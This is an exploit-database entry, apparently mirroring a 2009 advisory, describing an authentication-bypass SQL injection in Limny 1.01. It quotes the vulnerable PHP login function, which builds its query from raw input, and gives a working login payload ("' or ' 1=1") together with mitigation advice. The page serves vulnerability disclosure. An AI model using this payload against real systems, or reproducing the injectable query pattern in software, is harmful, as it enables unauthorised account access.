header-logo
Suggest Exploit
vendor:
Limny
by:
SirGod
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Limny
Affected Version From: 1.01
Affected Version To: 1.01
Patch Exists: YES
Related CWE: N/A
CPE: a:limny_project:limny
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Limny 1.01 (Auth Bypass) SQL Injection Vulnerability

Limny 1.01 is vulnerable to an authentication bypass vulnerability due to improper sanitization of user-supplied input. An attacker can exploit this vulnerability by supplying a specially crafted username and password to bypass authentication. The vulnerable code is located in includes/functions.php, where the CheckLogin() function does not properly sanitize user-supplied input before using it in an SQL query. This can be exploited to bypass authentication by supplying a specially crafted username and password.

Mitigation:

Upgrade to the latest version of Limny 1.01 or apply the patch from the vendor.
Source

Exploit-DB raw data:

###########################################################################################
[+] Limny 1.01 (Auth Bypass) SQL Injection Vulnerability
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
############################################################################################

[+] Script Homepage : http://www.limny-project.com/

[+] SQL Injection Vulnerability

 - Notes : magic_quotes_gpc = off

 - Vulnerable code in includes/functions.php

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

function CheckLogin($username, $password)
{
	global $db;
	$query = $db->query("SELECT user, pass FROM ".TABLE_PREFIX."users
WHERE user='$username' AND pass='$password'");
	if($check = $db->fetch_array($query))
	{
		return true;
	}else{
		return false;
	}
}

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

 - PoC

   Username : [REAL-ADMIN-NAME] ' or ' 1=1
   Password : anything

[REAL-ADMIN-NAME] = usually is admin

############################################################################################

# milw0rm.com [2009-07-27]